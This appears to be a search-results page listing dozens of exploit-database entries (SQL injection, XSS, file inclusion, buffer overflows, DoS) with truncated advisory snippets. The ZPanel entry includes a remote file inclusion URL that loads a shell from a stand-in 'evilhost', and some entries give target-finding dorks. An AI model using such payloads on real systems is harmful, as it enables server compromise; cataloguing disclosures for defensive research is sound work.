56796 matches found
GoAheaad Webserver Source Code Disclosure Vulnerability
No description provided by source. Exploit Title: GoAheaad Webserver Source Code Disclosure Vulnerability Date: 5-28-10 Author: Sil3ntDre4m Software Link: http://data.goahead.com/Software/Webserver/2.1.8/webs218.zip Version: 2.18 and earlier Tested on: Windows Affects: Windows platform only Code ...
Slash CMS - Multiple Vulnerabilities
No description provided by source. Exploit Title: Slash CMS Multiple Vulnerabilities Date: 21-03-2013 Author: DaOne aka Mocking Bird Vendor Homepage: http://www.slash-cms.com/ Software Link: http://sourceforge.net/projects/slashcms/ Category: webapps/php Google Dork: N/A Tested on:...
p4CMS <= 1.05 (abs_pfad) Remote File Include Vulnerability
No description provided by source. ============================================================================================== p4CMS = v1.05 abspfad Remote File Inclusion Exploit =============================================================================================== Critical Level :...
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
No description provided by source. $Id: ms07017aniloadimagechunksize.rb 10394 2010-09-20 08:06:27Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing...
Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/30766/info Folder Lock is prone to an information-disclosure vulnerability because it stores credentials in an insecure manner. A local attacker can exploit this issue to obtain passwords used by the application, which ma...
SugarCRM 1.x/2.0 Module Traversal Arbitrary File Access
No description provided by source. source: http://www.securityfocus.com/bid/11740/info SugarCRM is reported prone to multiple vulnerabilites arising from insufficient sanitization of user-supplied input. These issues can a remote attacker to carry out cross-site scripting, HTML injection, SQL...
Winamp <= 5.06 IN_CDDA.dll Remote Buffer Overflow Exploit
No description provided by source. / Credits go to the author How to fix and study the bug: - The cdda library only reserves 20 bytes for names when files are .cda - run Winamp with ollye - when loaded locate and break at: 10009BBB 8D4C24 20 LEA ECX,DWORD PTR SS:ESP+20 10009BBF 84C0 TEST AL,AL...
iOS My DBLite Edition - Remote 0day DoS Exploit
No description provided by source. !/usr/bin/python Apple Iphone/Ipod - My DBLite Edition Remote 0day DOS exploit Found by: Jason Bowes - admin @ blue-dogz.com App Homepage: www.xenugo.co Price: Free Download: From the app store use your itunes account Tested on: Iphone 3GS - firmware 3.1.2 What'...
AT-TFTP Server 1.8 - Remote Directory Traversal Vulnerability
No description provided by source. / / / / / // | / // \ | / / / / / /// / / / / / / / // / / / |/ / // / , / / // / / / / / //// //|///||/,/ / /// Live by the byte |// Members: Pr0T3cT10n -=M.o.B.=- TheLeader Sro Debug Contact: [email protected] -----------------------------------...
ONO Hitron CDE-30364 Router - Denial of Service
No description provided by source. !/usr/bin/python ----------------------------------------------------------------------------------------- Description: ----------------------------------------------------------------------------------------- Hitron Technologies CDE-30364 is a famous ONO Router...
Linux Kernel 2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/5178/info The Linux kernel is a freely available, open source kernel originally written by Linus Torvalds. It is the core of all Linux distributions. Recent versions of the Linux kernel include a collection of file...
Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability
No description provided by source...
TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras 1. Advisory Information Title: Multiple Vulnerabilities in TP-Link TL-SC3171 IP Cameras Advisory ID: CORE-2013-0618 Advisory URL:...
UBBCentral UBB.threads 6.0 Editpost.PHP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/12784/info It is reported that UBB.threads is prone to an SQL injection vulnerability. The SQL injection vulnerability is reported to affect the 'editpost.php' script. UBB.threads 6.0 is reported prone to this issue. It i...
Ipswitch WhatsUp Professional 2006 0 NmConsole/ToolResults.asp sHostname Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/17964/info WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-code disclosure, cross-site scripting, and input-validation...
MobilePublisherPHP <= 1.5 RC2 Remote File Include Vulnerability
No description provided by source. MobilePublisherPHP 1.5 RC2 functions.phpRemote Include Vulnerability Discovered by: Timq http://www.securitydb.org Team-Rootshell Email: timqathackernetworkdotcom http://www.securitydb.org Team-Rootshell Vulnerable: require $abspath./functions.php; Exploit PoC:...
212cafeBoard Multiple Cross-Site Scripting Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/22167/info 212cafeBoard is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code...
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)
No description provided by source. / Linux = 2.6.13 prctl kernel exploit C Julien TINNES If you read the Changelog from 2.6.13 you've probably seen: PATCH setuid core dump This patch mainly adds suidsafe to suiddumpable sysctl but also a new per process, user setable argument to PRSETDUMPABLE. Th...
GNU MyProxy 20030629 Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9846/info It has been reported that GNU MyProxy may be prone to a cross-site scripting vulnerability that may allow a remote attacker to execute HTML or script code in a user's browser. The issue presents itself due to...
TippingPoint IPS Unicode Character Detection Bypass Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/24855/info TippingPoint IPS is prone to a detection-bypass vulnerability because the appliance fails to properly handle Unicode characters. A successful exploit of this issue may allow an attacker to bypass the filter and...
netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/39558/info netKar PRO is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. Exploiting this issue will cause the server to copy data to a NULL pointer, which wil...
Siteframe Beaumont 5.0.1/5.0.2 Page.PHP HTML Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16695/info Siteframe Beaumont is prone to an HTML-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script...
Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow
No description provided by source. $Id: mswhalecheckforupdates.rb 9262 2010-05-09 17:45:00Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...
ZoneAlarm 6.1.744.001/6.5.737.000 Vsdatant.SYS Driver Local Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/23494/info ZoneAlarm is prone to a local denial-of-service vulnerability. This issue occurs when attackers supply invalid argument values to the 'vsdatant.sys' driver. A local attacker may exploit this issue to crash...
Typsoft FTP Server 1.10 Multiple Commands DoS
No description provided by source. !/usr/bin/perl Exploit Title: Typsoft FTP Server DoS CWD command Date: 02/06/2012 Author: Balazs Makany Software Link: http://sourceforge.net/projects/ftpserv/ Version: 1.10 Tested on: Windows 7 does not work on Windows XP Please note, that you need to have a...
Novell GroupWise Messenger <= 2.1.0 Memory Corruption
No description provided by source. Luigi Auriemma Application: Novell GroupWise Messenger http://www.novell.com/products/groupwise/ Versions: = 2.1.0 Platforms: Windows, Linux, NetWare Bug: memory corruption Exploitation: remote, versus server Date: 16 Feb 2012 found 10 May 2011 Author: Luigi...
vCard PRO 0 gbrowse.php cat_id Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/18699/info VCard PRO is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. A successful exploit...
RedHat 4.x/5.x/6.x,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.x man Buffer Overrun (1)
No description provided by source. / source: http://www.securityfocus.com/bid/1011/info RedHat 4.0/4.1/4.2/5.0/5.1/5.2/6.0/6.2,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.2/4.4 man Buffer Overrun Vulnerability A buffer overflow exists in the implementation of the 'man' program shipped with...
Klf-Realty 2.0 search_listing.asp Multiple Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/21199/info Klf-Realty is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to...
Thomson SpeedTouch 2030 SIP Invite Message Remote Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/25446/info Thomson SpeedTouch 2030 is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP INVITE messages. Exploiting this issue allows remote attackers to cause the device ...
osCommerce 2.2 admin/specials.php page Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the...
PhpGedView 2.x Descendancy.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/11868/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. This issue could permit a remo...
ZPanel <= 2.5 - Remote SQL Injection Exploit
No description provided by source. Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10, remote - in ZPanel 2.0. exploit for v 2.0 http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code...
GNUBoard 4.31.04 (09.01.30) Multiple Local/Remote Vulnerabilities
No description provided by source. GNUBoard V4.31.04 09.01.30 Multiple Local/Remote Vulnerability bY [email protected] / SIR GNUBoard VERSION 4.31.04 09.01.30is a widely used bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. But we find a file...
World Of Warcraft Local Stack Overflow Dos Exploit (chat-cache.txt)
No description provided by source. !/usr/bin/perl Exploit Title: World Of Warcraft Local Stack Overflow Dos Exploit chat-cache.txt Date: 04/09/2011 Author: BSOD Digital Fabien DROMAS Other details:Code Exec Exploit in analysis. Tests: OS: Windows 7 Versions: burning crusade,cataclism, Demo Versio...
OpenBB 1.0.x Image Tag Cross-Agent Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/4171/info OpenBB is web forum software written in PHP. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. OpenBB allows users to include images in forum messages using image...
Virtual Programming VP-ASP 4.00/5.00 shopdisplayproducts.asp SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9134/info It has been reported that VP-ASP may be prone to a SQL injection vulnerability that may allow an attacker to disclose sensitive information by supplying malicious SQL code to the underlying database. The problem...
QuickTeam 2.2 - SQL Injection
No description provided by source. | D R U N K E N | || || || D A N I S H | || || |' R E D N E C K S '--''--''--' RESEARCH AND FUCKING HACKING: | DRUNKEN DANISH REDNECKS | || || || !!!!!!! | || || |' [email protected] '--''--''--' = QUICKTEAM 2.2 SQL INJECTION WE STEEL YOUR DAMNED...
SysCP 1.2.x Multiple Script Execution Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/14490/info SysCP is affected by multiple script execution vulnerabilities. The following specific vulnerabilities were identified: The application is affected by a remote file include vulnerability. An attacker can includ...
Hosting Controller 1.x DSNManager Directory Traversal Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/4759/info Hosting Controller is an application which consolidates all hosting tasks into one interface. Hosting Controller runs on Microsoft Windows operating systems. The DSNManager script does not sufficiently filter...
Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
No description provided by source. $Id: ms09043owcmsdso.rb 9893 2010-07-20 23:28:47Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
Quantum Art QP7.Enterprise news_and_events_new.asp p_news_id Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/16022/info QP7.Enterprise is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. Successful...
MapInfo Discovery 1.0/1.1 Administrative Login Bypass
No description provided by source. source: http://www.securityfocus.com/bid/10927/info Multiple remote vulnerabilities are reported in MapInfo Discovery. The first issue is reported to be an information disclosure vulnerability. An attacker may gain access to potentially sensitive error log...
MySQL AB Eventum 1.x view.php id Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/14436/info MySQL Eventum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issu...
Mantis 0.x/1.0 manage_user_page.php sort Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/16657/info Mantis is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize...
MusicBox 2.3 index.php Multiple Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/17149/info MusicBox is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly saniti...
sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal file disclosure vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8516/info SAP is said to be prone to a directory traversal vulnerability, potentially allowing users to disclose the contents of sensitive files. The problem occurs due to the application failing to parse user-supplied...
ASPilot Pilot Cart 7.3 newsroom.asp SQL Injection Vulnerability
No description provided by source. Title: ASPilot Pilot Cart 7.3 SQL Injection Date: 12.11.2010 Author: Daikin Software Link: http://www.pilotcart.com Version: 7.3 maybe also lower Vendor's Description of Software and demo: http://www.pilotcart.com Dork: Powered by Pilot Cart V.7.3 Application...
NooMS CMS 1.1.1 - CSRF
No description provided by source. NooMS CMS version 1.1.1 CSRF Bug Found: April 9th 2011 Found by: loneferret as far as I know anyway Software Download Link: http://phpkode.com/download/p/2381nooms1.1.1.tar.bz2 Nods to exploit-db Team Well, I didn't have much to do this morning so figured I'd tr...
D-Link DI-704P Long URL Denial of Service Vulnerability
No description provided by source...